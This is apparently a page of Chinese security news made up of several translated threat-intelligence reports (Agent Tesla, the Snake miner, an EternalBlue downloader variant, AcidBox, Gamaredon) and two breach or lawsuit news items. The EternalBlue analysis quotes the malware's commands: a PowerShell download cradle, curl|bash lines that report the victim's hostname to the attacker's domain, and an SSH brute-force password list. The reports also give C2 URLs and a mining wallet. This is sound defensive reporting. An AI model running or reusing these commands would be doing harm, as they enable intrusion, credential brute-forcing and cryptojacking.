去年年底，我们发现了针对欧洲和中东地区的航空航天和军事公司的攻击活动，该攻击在2019年9月至2019年12月非常活跃。通过对两家受影响的欧洲公司的深入调查，我们对其攻击活动进行了深入了解，发现了之前从未被记录的恶意软件。 本文将对攻击活动的具体情况进行分析，完整的分析报告可查看白皮书《运营感知：针对欧洲航空航天和军事公司的针对性攻击》。 基于名为Inception.dll的相关恶意软件样本，我们将这些攻击称为“操作感知”，发现这些攻击活动具有很高的针对性。 为了危及目标，攻击者以诱人的虚假工作机会为幌子。在取得信任后，开始部署了自定义的多级恶意软件以及修改过的开源工具。除此之外还采用“陆上生存”策略，滥用合法工具和操作系统功能，使用多种技术来避免检测（其中包括代码签名、定期对恶意软件进行重新编译以及冒充合法公司来进行诈骗）。 我们调查了解到该行动的主要目标是间谍活动。但是在调查的某个案例中发现攻击者试图通过商业电子邮件折衷攻击(BEC)将访问受害者电子邮件帐户的权限货币化。虽然我们没有找到有力的证据将攻击与已知的威胁行为者联系起来，但发现了一些可能与Lazarus集团有联系的线索（其中包括定位目标、开发环境和使用的技术分析）。   … 更多内容请至Seebug Paper阅读全文：https://paper.seebug.org/1248/     消息来源：welivesecurity，译者：dengdeng。 本文由 HackerNews.cc 翻译整理，封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

感谢腾讯御见威胁情报中心来稿！ 原文链接：https://mp.weixin.qq.com/s/QBkjAGuGBIZ7yzDNEYhxOg   概述 “贪吃蛇”挖矿木马曾在2019年4月被腾讯安全团队发现，因其在感染服务器后即会清除其他挖矿木马独占服务器资源而得名。“贪吃蛇”挖矿木马团伙主要针对MS SQL服务进行爆破弱口令攻击，爆破成功后会进行提权攻击获得系统权限，然后植入门罗币挖矿木马以及大灰狼远控木马。 “贪吃蛇”挖矿木马新变种的攻击流程 该团伙在2019年也对木马进行过一次更新，但第二个版本中被其他团队植入了后门（黑吃黑也是传统套路）。腾讯安全团队本次捕获的“贪吃蛇”挖矿木马新版在攻击流程上与前面略有区别。首先病毒对提权工具进行更新，抛弃了2015及以前的提权漏洞，引入2019年新的提权漏洞，病毒爆破成功之后提权获得系统权限的概率得以大幅提升。 “贪吃蛇”新版本清理的竞品挖矿木马也比旧版更多, 病毒还会添加Windows防火墙规则阻止其他挖矿木马入侵。攻击流程上也有所简化，不再借用第三方大厂的白文件，而是直接劫持系统进程或服务进行攻击。 腾讯安全T-Sec终端安全管理系统及腾讯电脑管家均可查杀该病毒，腾讯安全专家建议企业网管尽快纠正MS SQL服务器存在的弱口令风险，避免黑客远程爆破成功。 详细分析 攻击团伙对MS SQL服务器爆破成功后，会直接下载提权模块攻击以获取系统最高权限。与第一版贪吃蛇不同的是，第一版提权完成后会从网络上下载后续功能模块，而新版中在提权模块中直接包含后续的功能模块，大部分内嵌在PE中。 新版内嵌PE会存放在数据段 而旧版本是内嵌在资源段中 流程开始后首先释放提权模块，罗列了一下新版贪吃蛇与旧版使用的提权工具区别，提权漏洞升级了。 旧版本： 新版本： 提权工作完成后，释放SQLA.exe文件，该文件内置6个PE文件，其中2个文件是密文形式存放，逐个分析其功能。 Rundllexe.Dll：这个dll有内嵌x64版本，会被注册为打印机程序 Dll启动rundllexe.Exe Rundllexe.exe启动后把大灰狼远控注入到svchost中 大灰狼模块被释放到C:\Windows\MpMgSvc.dll中 C2: down.361com.com 备份rundll代码到注册表 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ODBC\Rundll 接着下载x64.exe，hxxp://124.160.126.238/1.exe，这个模块主要用来投递挖矿木马，入口处通过修改Windows防火墙规则，阻止其他挖矿木马入侵。 解密出active_desktop_render.dll释放到c:\windows\help\ active_desktop_render.dll会把自身注册为服务，服务名GraphicsPerf_Svcs active_desktop_render.dll内置一个PE文件，解密后得到DeskTop EXE.主要负责投递挖矿木马，首先下载hxxp://118.45.42.72/Update.txt，文件中描述了挖矿木马名称及大小。 还需要根据配置描述，清除其他竞品挖矿木马 “加固清理”之后下载挖矿木马hxxp://www.362com.com/32.exe，并设置挖矿启动项，挖矿木马使用的文件名和系统文件名一样，以便伪装。 TrustedInsteller.exe WmiApSvr.exe WUDFhosts.exe HelpSvc.exe 劫持这4个系统文件，提高存活几率： 矿池及钱包仍然异或加密存储在文件中 矿池：pool.usa-138.com:80 钱包：4B7yFmYw2qvEtWZDDnZVeY16HHpwTtuYBg6EMn5xdDbM3ggSEnQFDWDHH6cqdEYaPx4iQvAwLNu8NLc21QxDU84GGxZEY7S 清除其他挖矿木马也更加全面 IOCs MD5 3841eed7224b111b76b39fe032061ee7 a865ec970a4021f270359761d660547c 70e694d073c0440d9da37849b1a06321 4a72e30c0a582b082030adfd8345014f 645564cf1c80e047a6e90ac0f2d6a6b7 ce614abf6d6c1bbeefb887dea08c18a3 f03f640de2cb7929bbbafa3883d1b2a9 5d2e9716be941d7c77c05947390de736 3a1e14d9bbf7ac0967c18a24c4fd414b dc60a503fb8b36ab4c65cdfa5bd665a1 9450249ae964853a51d6b55cd55c373e f4f11dc6aa75d0f314eb698067882dd5 18936d7a1d489cb1db6ee9b48c6f1bd2 b660ad2c9793cd1259560bbbfbd89ce6 2ee0787a52aaca0207a73ce8048b0e55 URLs hxxp://www.362com.com/32.exe hxxp://www.362com.com/64.exe hxxp://118.45.42.72/Update.txt hxxp://118.45.42.72/22.exe hxxp://www.362com.com/Update.txt hxxp://124.160.126.238/1.exe hxxp://124.160.126.238/tq.exe hxxp://124.160.126.238/11.exe hxxp://124.160.126.238/Down.exe hxxp://124.160.126.238/MSSQL.exe Domain www.361com.com www.362com.com 22ssh.com IP 124.160.126.238 （ZoomEye搜索结果） 118.45.42.72 （ZoomEye搜索结果）

2014年一个名为Turla Group的恶意软件组织消息出现，爱沙尼亚外交情报局推断它源于俄罗斯，代表俄罗斯联邦安全局（FSB）进行运作，该组织核心恶意软件也被公开描述为第一个滥用第三方程序来禁用DSE的案例。在Windows Vista中引入了这种安全机制，以防止未签名的驱动程序加载到内核空间。Turla利用了签名的VirtualBox驱动程序——VBoxDrv.sysv1.6.2来停用DSE，然后对未签名的有效负载驱动程序进行加载。 然而，这个漏洞有一些混淆，它被称为CVE-2008-3431。Turla使用的漏洞实际上滥用了两个漏洞，其中只有一个在前面提到的CVE中被修复过。另一个漏洞与CVE-2008-3431一起用在第一个攻击版本中，第二个攻击版本大约在2014年引入了内核模式恶意软件，其只使用了未修补的漏洞，我们将在后面详细讨论。 2019年2月，Unit 42发现了尚未知晓的威胁因素（信息安全社区不知道），发现第二个未修补的漏洞不仅可以利用VirtualBox VBoxDrv.sys驱动程序 v1.6.2，还可以利用 v3.0.0以下的所有其他版本。此外我们研究发现这个未知的参与者利用VirtualBox驱动程序2.2.0版，在2017年攻击至少两个不同的俄罗斯组织。我们猜测这样做是因为驱动程序版本2.2.0并不易受攻击，因此很可能不会被安全公司发现。由于没有发现其他受害者，我们认为这是一个非常罕见的恶意软件，仅用于目标攻击。 操作者使用了一个之前未知的恶意软件家族，我们称之为AcidBox。由于该恶意软件的复杂性、稀有性以及它是一个更大的工具集的一部分这一事实，我们相信它被高级威胁参与者用于定向攻击。如果攻击者仍然活跃的话，这个恶意软件很可能今天仍在使用。但是，我们预计它在一定程度上被重写了。根据我们掌握的信息，我们认为除了使用过的漏洞之外，这个未知的威胁因素与Turla无关。   … 更多内容请至Seebug Paper阅读全文：https://paper.seebug.org/1247/     消息来源：paloaltonetworks，译者：dengdeng。 本文由 HackerNews.cc 翻译整理，封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

感谢腾讯御见威胁情报中心来稿！ 原文链接：https://mp.weixin.qq.com/s/1aQGlBxBwBOrdrW3B9l4tA   背景 腾讯安全威胁情报中心检测到有Agent Tesla商业木马变种正在通过钓鱼邮件传播。攻击者伪装成某国大型航运公司发送以货运单据为主题的钓鱼邮件，并在附件中加入由木马打包而成的压缩程序。 使用C#编译的木马外壳首先从资源文件中读取和加载Load程序PhotoDirector.dll，攻击者采用隐写技术，将木马执行程序隐藏在图片资源中，从图片资源中读取、解密得到Agent Tesla木马的exe可执行程序。 Agent Tesla为一款知名的商业窃密木马，木马执行后，会从资源中解密出现核心窃密程序，窃取中毒电脑的机密信息。包括：键盘记录，截屏，剪贴板记录，以及摄像头图像。还会从电脑上提取还原多种登录信息缓存，包括浏览器中保存的各网站登录帐号和密码，邮件客户端中保存的用户名密码，FTP工具、下载器中保存的密码等等。 窃取的数据通过Web Panel的方式回传至C&C服务器。一切完成之后，该木马会删除自身，清理痕迹。 腾讯安全专家建议用户小心处理不明电子邮件附件，腾讯安全旗下的系列产品均可检测、查杀Agent Tesla系列窃密木马。 样本分析 伪装成某国航运公司发送的以货运单据为主题的钓鱼邮件，附件名为“BL Draft Copy-shipping DocumentsEXCEL.XLS.xlsx.gz.zip”。 伪造的发件邮箱tassgroup.com属于TRANS ASIA GROUP公司，该公司是南亚某国一家集造船、航运、集装箱、物流等业务为一体的集团公司。 附件解压得到exe程序“BL Draft Copy-shipping DocumentsEXCEL.XLS.xlsx.gz.exe”，是木马外壳程序，采样C#编写。 外壳程序被命名为BlackJack。 Main函数进入Form1，完成初始化后调用BCAS类中BCAS()函数，代码被插入大量无效指令。 在无效指令之后调用AIJISAJIS()，进行资源文件的解密和加载。 BlackJack共有两个资源文件，一个是二进制文件资源“PhotoDirector_2”，另一个是图片文件资源“cxpjNoVVdqvwNYmThlfPxwKQGrxcLPY”。 首先将二进制文件作为PhotoDirector.dll加载到内存，该dll采样C#编写，主要功能是从母体的中获得图片资源，从图片中解密出数据，利用自定义的异或算法处理数据后得到Agent Tesla家族的exe文件，并在内存中加载执行。 获取图片中数据的代码为：首先遍历图片中的每个像素点，对每个像素点的RGB数据依次排列。 然后对读取到的数据利用自定义异或算法进行解密。 解密得到Agent Tesla木马ReZer0V2.exe，木马同样采样C#编写，其字符串经过混淆，仍然有两个资源文件，一个二进制文件“qfwH1”，一个XML文件XML。 拷贝自身到%Romaing%\XLwdDWHDKFdwB.exe目录下，并利用资源中的XML文件安装执行木马的计划任务Updates\XLwdDWHDKFdwB，在系统每次登陆时执行一次： 从“qfwH1”资源中解密出C++编译的核心窃密exe文件，解密算法和上述异或算法相同，然后加载该exe到内存执行。 窃密exe枚举注册表SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall获取系统安装的软件信息： 从注册表中读取FTP服务地址、用户名和密码信息： Software\Far\Plugins\FTP\Hosts Software\Far2\Plugins\FTP\Hosts Software\Far Manager\Plugins\FTP\Hosts Software\Far\SavedDialogHistory\FTPHost Software\Far2\SavedDialogHistory\FTPHost Software\Far Manager\SavedDialogHistory\FTPHost 从XML文件sitemanager.xml、filezilla.xml、recentservers.xml中获取FTP服务地址、用户名和密码信息 读取wiseftpsrvs.ini、wiseftp.ini、32BitFtp.ini、ftpsite.ini等INI文件中保存的FTP账号密码信息 从注册表中获取ExpanDrive网盘的账号密码信息： 获取Windows Live Mail、Outlook、RimArts、Pocomail、IncrediMail 、The Bat!等邮箱客户端保存的账号密码信息： 从Chrome等浏览器中获取用户账号密码信息： 将敏感信息加密后发送至http[:]//chelitos.com.ve/folders/folder/bin/trash/panel/gate.php 窃取任务完成后，创建bat脚本执行自删除： 木马生成器 1、工具简介 攻击者生成木马时使用的自动化工具名为AgentTesla，是一个功能比较完整的恶意木马生成器，生成器作者已经开始通过出售工具帐号牟利。 2、使用.NET作为开发语言 .NET语言开发的程序中包含经过编译的字节码，在.NET环境中进行解释和执行，这就给样本的调试和分析带来了一定的困难。同时，.NET库中拥有丰富的工具类，在迅速搭建可用的程序方面具有一定的优势。 3、支持多类信息窃取行为 工具可以自定义生成的木马窃取的信息，包括键盘记录，截屏，剪贴板记录，以及摄像头图像。工具使用者还可以自定义记录的抓取间隔时间。 同时，工具还可以从电脑上提取还原多种登录信息缓存，包括浏览器中保存的网站帐号密码，邮件客户端中保存的密码，FTP工具、下载器中保存的密码等。 4、支持多种回传方式 工具可以自定义木马将窃取到的信息回传给木马传播者的方式，包括网络接口方式、邮件方式以及FTP方式。 在FTP方式下，工具使用者可以指定上传信息时用到的ftp地址、用户名和密码。 在邮件方式下，工具使用者可以指定邮箱服务器地址、用户名和密码。 如果使用者采用网络接口方式，则需要从工具官网下载一套完整的管理页面，并部署在自己的网站上。本次攻击中采用这种方式，使用者将chelitos.com.ve作为C&C服务器，生成的木马运行后会连接该服务器并接收相应的指令。 5、木马与服务器之间传递的指令包括： IOCs MD5 a2bf53ed2269b816d8c28e469e8c2603 adfd08c1928106a23c6ef0464885dfb9 URL http[:]//chelitos.com.ve/folders/folder/bin/trash/panel/gate.php http[:]//chelitos.com.ve/shit.exe 参考链接： https://www.freebuf.com/column/149525.html

Valak是使用基于脚本的多阶段恶意软件，该软件劫持电子邮件并嵌入恶意URL附件，以使用无文件脚本来感染设备。 相关摘要 Valak使用了基于脚本的恶意软件，这些恶意软件在广告活动中使用，其与Gozi ConfCrew相关联。 重复的攻击活动导致一些报道将Valak误认为是Gozi。 电子邮件被收集起来并运用在“回复链攻击”中，以专门构建插件“ exchgrabber”来进一步传播。 新发现的名为“ clientgrabber”的插件还用于从注册表中窃取电子邮件凭据。 有关Varak详情请见报告：https://assets.sentinelone.com/labs/sentinel-one-valak-i   … 更多内容请至Seebug Paper阅读全文：https://paper.seebug.org/1246/     消息来源：sentinelone，译者：dengdeng。 本文由 HackerNews.cc 翻译整理，封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

研究人员发现，高度活跃的Gamaredon威胁组织在各种恶意活动中使用了未被记录的工具，其中一个是针对微软Outlook的VBA宏（使用电子邮件向受害者的Microsoft Office通讯簿中的联系人发送鱼叉式钓鱼邮件）。我们还进一步分析了Gamaredon工具，这些工具能够将恶意宏和远程模板注入到现有的Office文档中。 自2013年起Gamaredon组织开始活跃。CERT-UA和乌克兰其他官方机构的报告中证实了它曾对乌克兰机构发起了袭击。在过去的几个月里，这个群体的活动有所增加，不断有恶意邮件袭击他们目标的邮箱。这些电子邮件的附件是带有恶意宏的文档，在执行时会尝试下载多种不同的恶意软件变种。Gamaredon使用了许多不同的编程语言，从 c#到VBScript、批处理文件和c/c++。 Gamaredon使用的工具非常简单，旨在从受到威胁的系统中收集敏感信息并进一步传播。与其他APT组织不同的是，Gamaredon组织行为却非常高调。尽管他们的工具具有下载和执行更隐秘的任意二进制文件的能力，但该小组的主要重点却是在试图窃取数据的同时，在目标网络中尽可能快地传播。   … 更多内容请至Seebug Paper阅读全文：https://paper.seebug.org/1245/     消息来源：welivesecurity，译者：dengdeng。 本文由 HackerNews.cc 翻译整理，封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接  

感谢腾讯御见威胁情报中心来稿！ 原文链接：https://mp.weixin.qq.com/s/ZoiKCTEaxhXIXsI4OzhWvA   一、概述 2020年6月10日，腾讯安全威胁情报中心检测到永恒之蓝下载器木马出现变种。此次变种在上个版本“黑球”行动中检测SMBGhost漏洞的基础上首次启用SMBGhost漏洞攻击，之前的若干种病毒只是利用SMBGhost漏洞做扫描检测，并无实质性攻击利用。本次更新还启用了SSH爆破以及新增Redis爆破能力攻击Linux系统。 由于SMBGhost漏洞CVE-2020-0796利用Windows SMB漏洞远程攻击获取系统最高权限，可直接攻击SMB服务造成RCE（远程代码执行），存在漏洞的计算机只要联网就可能被黑客探测攻击，并获得系统最高权限。该攻击行动使得“永恒之蓝”系列木马针对Windows系统的攻击能力再次增强。 腾讯安全威胁情报中心曾多次发布SMBGhost漏洞风险提示，至今仍有近三分之一的系统未修补该漏洞，我们再次强烈建议所有用户尽快修补SMBGhost漏洞（CVE-2020-0796）。 此外永恒之蓝下载器木马还新增了针对Linux系统的远程攻击，在失陷系统创建定时任务并植入挖矿木马功能，使得其攻击的范围继续扩大，包括云上Linux主机等都可能成为攻击目标。永恒之蓝本次更新的主要目的是释放挖矿木马，并会按照惯例在开始挖矿前，清除其他挖矿木马，以便独占系统资源。挖矿活动会大量消耗企业服务器资源，使正常业务受严重影响。 二、样本分析 攻击模块if.bin在smbghost_exec函数中利用从hxxp://d.ackng.com/smgh.bin下载的SMBGhost漏洞攻击程序发起攻击，攻击成功后远程执行以下shellcode: powershell IEx(New-Object Net.WebClient).DownLoadString(''http[:]///t.amynx.com/smgho.jsp?0.8*%computername%'') 针对Linux系统服务器的攻击 1、利用SSH爆破 扫描22端口进行探测，针对Linux系统root用户，尝试利用弱密码进行爆破连接，爆破使用密码字典： “saadmin”,”123456″,”test1″,”zinch”,”g_czechout”,”asdf”,”Aa123456.”,”dubsmash”,”password”,”PASSWORD”,”123.com”,”admin@123″,”Aa123456″,”qwer12345″,”Huawei@123″,”123@abc”,”golden”,”123!@#qwe”,”1qaz@WSX”,”Ab123″,”1qaz!QAZ”,”Admin123″,”Administrator”,”Abc123″,”Admin@123″,”999999″,”Passw0rd”,”123qwe!@#”,”football”,”welcome”,”1″,”12″,”21″,”123″,”321″,”1234″,”12345″,”123123″,”123321″,”111111″,”654321″,”666666″,”121212″,”000000″,”222222″,”888888″,”1111″,”555555″,”1234567″,”12345678″,”123456789″,”987654321″,”admin”,”abc123″,”abcd1234″,”abcd@1234″,”abc@123″,”p@ssword”,”P@ssword”,”p@ssw0rd”,”P@ssw0rd”,”P@SSWORD”,”P@SSW0RD”,”P@w0rd”,”P@word”,”iloveyou”,”monkey”,”login”,”passw0rd”,”master”,”hello”,”qazwsx”,”password1″,”Password1″,”qwerty”,”baseball”,”qwertyuiop”,”superman”,”1qaz2wsx”,”fuckyou”,”123qwe”,”zxcvbn”,”pass”,”aaaaaa”,”love”,”administrator”,”qwe1234A”,”qwe1234a”,” “,”123123123″,”1234567890″,”88888888″,”111111111″,”112233″,”a123456″,”123456a”,”5201314″,”1q2w3e4r”,”qwe123″,”a123456789″,”123456789a”,”dragon”,”sunshine”,”princess”,”!@#$%^&*”,”charlie”,”aa123456″,”homelesspa”,”1q2w3e4r5t”,”sa”,”sasa”,”sa123″,”sql2005″,”sa2008″,”abc”,”abcdefg”,”sapassword”,”Aa12345678″,”ABCabc123″,”sqlpassword”,”sql2008″,”11223344″,”admin888″,”qwe1234″,”A123456″,”OPERADOR”,”Password123″,”test123″,”NULL”,”user”,”test”,”Password01″,”stagiaire”,”demo”,”scan”,”P@ssw0rd123″,”xerox”,”compta” 爆破登陆成功后执行远程命令： `Src=ssho;(curl -fsSL http[:]//t.amynx.com/ln/core.png?0.8*ssho*`whoami`*`hostname`||wget -q -O- http[:]//t.amynx.com/ln/core.png?0.8*ssho*`whoami`*`hostname`) | bash` 2、利用Redis未授权访问漏洞 扫描6379端口进行探测，在函数redisexec中尝试连接未设置密码的redis服务器，访问成功后执行远程命令： `export src=rdso;curl -fsSL t.amynx.com/ln/core.png?rdso|bash` SSH爆破和Redis爆破登陆成功均会执行Linux Shell脚本core.png，该脚本主要有以下功能： a.创建crontab定时任务下载和执行脚本http[:]//t.amynx.com/ln/a.asp b.创建crontab定时启动Linux平台挖矿木马/.Xll/xr 通过定时任务执行的a.asp首先会清除竞品挖矿木马： 然后通过获取/root/.sshown_hosts中记录的本机SSH登陆过的IP，重新与该机器建立连接进行内网扩散攻击： 创建目录/.Xll并下载挖矿木马（d[.]ackng.com/ln/xr.zip）到该目录下，解压得到xr并连接矿池lplp.ackng.com:444启动挖矿。 永恒之蓝下载器木马自2018年底诞生以来一直处于高度活跃状态，目前该木马会通过以下方法进行扩散传播： 截止2020年6月12日，永恒之蓝木马下载器家族主要版本更新列表如下： IOCs Domain t.amynx.com t.zer9g.com t.zz3r0.com d.ackng.com URL http[:]//t.amynx.com/smgh.jsp http[:]//t.amynx.com/a.jsp http[:]//t.amynx.com/ln/a.asp http[:]//t.amynx.com/ln/core.png http[:]//d.ackng.com/if.bin http[:]//d.ackng.com/smgh.bin http[:]//d.ackng.com/ln/xr.zip

据外媒报道，当地时间周三，谷歌受到来自亚利桑那州司法部长Mark Brnovich提起的诉讼，后者指控这家搜索巨头欺骗用户并从他们的手机中收集位置数据。我们知道，谷歌的绝大部分收入来自其庞大的广告业务，而谷歌在用户使用其产品时收集的个人信息为其提供了支撑。 对此，Brnovich在Twitter上发文指出，用户被一种虚假的安全感欺骗了，因为谷歌让用户认为他们禁用了位置数据收集的设置，而实际上这些设置仍旧是处于开启状态。 该诉讼要求谷歌提供损害赔偿，但具体金额尚不清楚。Brnovich的办公室也没有回复记者的置评请求。 谷歌则有在一份声明中为自己关于位置数据的政策进行过辩护。发言人Jose Castaneda表示：”司法部长和收取诉讼费用的律师似乎错误地描述了我们的服务。我们一直在我们的产品中内置了隐私功能并为位置数据提供了强大的控制。我们期待澄清事实。”     （稿源：cnBeta，封面源自网络。）  

信息窃取软件是常见的恶意软件之一。 如：多平台远程管理工具（RAT)Netwire (MITRE S0198)从2012年开始被网络犯罪组织不断使用。在我们进行网络监测期间，发现了一个特定的Office文档，该文档通过安装恶意软件插件，来对意大利人民发起隐藏性的网络攻击活动，这种攻击活动的特定供给链采取了独特的技术模式，类似于这种，本文将对此进行深入分析。   … 更多内容请至Seebug Paper阅读全文：https://paper.seebug.org/1238/     消息来源：yoroi， 译者：dengdeng。 本文由 HackerNews.cc 翻译整理，封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

在过去几个月时间里，任天堂被黑客入侵的用户账号数量几乎翻了一番。这家日本游戏巨头最初披露信息称，共有16万个任天堂账号遭到入侵，泄露的个人信息包括账号所有者的姓名、电子邮件地址、出生日期和居住国等。但据任天堂公布的更新声明显示，另有14万个账号被泄露。声明称，继续调查的结果使得这一数字上升。任天堂表示，该公司重新设置了这些账号的密码，并与受影响用户取得了联系。声明重申，任天堂的所有账号中仅有不到1%受到了此次黑客入侵事件的影响。 账号信息泄露的消息最早是在3月传出的，当时任天堂用户抱怨称其账号在未经许可的情况下被收取了数字物品费用。 任天堂4月发布Twitter消息称，用户应为自己的账号启用双因素身份验证功能，但并未说明原因。两周之后，任天堂才承认大量账号被不当访问，但仍未透露这些账户是如何被访问的，只是声称黑客通过“我们服务以外的某种方式”获得了密码，从而获得了账号的访问权限。这意味着用户可能使用了保密性较弱的密码，或者重复使用了在其他服务中已被破解的密码，并被黑客用来入侵其任天堂账号。     （稿源：新浪科技，封面源自网络。）